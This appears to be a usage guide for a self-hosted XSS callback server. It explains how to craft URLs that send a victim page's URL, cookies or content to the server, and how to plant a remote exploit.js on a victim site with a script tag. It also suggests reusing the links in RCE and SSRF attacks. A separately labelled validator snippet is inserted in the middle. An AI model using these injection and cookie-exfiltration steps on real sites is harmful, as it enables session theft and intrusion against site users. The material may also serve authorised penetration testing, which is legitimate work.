Get Started
Make sure you have set all your variables in the .env file before reading on.
Endpoints:
- /logger/{your_code}: Send normal requests here to have them logged (request logging).
- /: Send requests here to generate injection alerts. It accepts query string parameters such as url, by, code, plaintext, cookie, and b64.
- /exploit.js: This is where the exploit.js file is served; you can link this JS file remotely to the victim server with a script tag.
Parameters:
- url: Specifies location of the current document/webpage
- by: Specifies username of the user that sent this payload
- an action parameter (choices: plaintext, b64, cookie, or none (leave blank))
- xss: Specifies if it's an XSS attack
- code: Required, because you need your code to access the endpoints (it is the same code as in your .env file)
Headers for XSS testing:
- xsend-xss-payload: This header is used to track which XSS payload was used when detection is successful
How to use the alerts webhook:
- 1.) First decide which action parameter to use: plaintext, b64, cookie, or none (leave blank)
- 2.) In this case I choose plaintext
- 3.) Then remember the required parameters: url, code, and by
- 4.) Craft the URL with those: http://localhost:4000/?url=victim_url&code=yourcode&by=yourusername&plaintext=
- 5.) Inject this inside an HTML tag or JavaScript code that will make a request to this URL
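Added example (not the project's own code): a receiver-side check of a request to the alerts endpoint against the parameter rules listed above. The function names, the error strings, and the rule that at most one action parameter may be present are assumptions made for this sketch.

```javascript
// Added example: validate an alerts-endpoint ("/") request against the
// documented contract: url, code and by are required, and the action
// parameter is one of plaintext, b64, cookie, or absent.
const ACTIONS = ["plaintext", "b64", "cookie"];
const REQUIRED = ["url", "code", "by"];

// Compare the access code without returning early on the first differing
// character, so response timing does not reveal how much of it matched.
function safeEqual(a, b) {
  let diff = a.length ^ b.length;
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    diff |= (a.charCodeAt(i) || 0) ^ (b.charCodeAt(i) || 0);
  }
  return diff === 0;
}

// rawUrl: full or relative request URL; expectedCode: the code from .env.
function checkAlertRequest(rawUrl, expectedCode) {
  // The base is only used when rawUrl is relative (e.g. taken from a request line).
  const u = new URL(rawUrl, "http://localhost:4000");
  const q = u.searchParams;
  const errors = [];

  if (u.pathname !== "/") errors.push("not the alerts endpoint");
  for (const name of REQUIRED) {
    if (!q.get(name)) errors.push(`missing required parameter: ${name}`);
  }
  const code = q.get("code");
  if (code && !safeEqual(code, expectedCode)) errors.push("code mismatch");

  // An empty value still counts as "present" (plaintext= in the example URL).
  const present = ACTIONS.filter((a) => q.has(a));
  if (present.length > 1) errors.push("more than one action parameter");
  const action = present.length === 1 ? present[0] : "none";

  return {
    ok: errors.length === 0,
    errors,
    action,
    by: q.get("by"),
    url: q.get("url"),
    xss: q.has("xss"),
  };
}
```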
How to use the logger webhook:
- 1.) code is the only required parameter for this
- 2.) Craft the URL to the logger endpoint: http://localhost:4000/logger/{your_code}/{custom_message}
- Example: http://localhost:4000/logger/123456/anythingblahblah
How to link to the exploit.js script:
- 1.) Craft the URL to the JS file: http://localhost:4000/exploit.js
- 2.) Embed it in a script tag: <script src="http://localhost:4000/exploit.js"></script>
Now you can craft all the links into your XSS/HTML payload, or even use them in other injection attacks that support HTTP requests, like some RCE and SSRF contexts. Check the generator here: Generator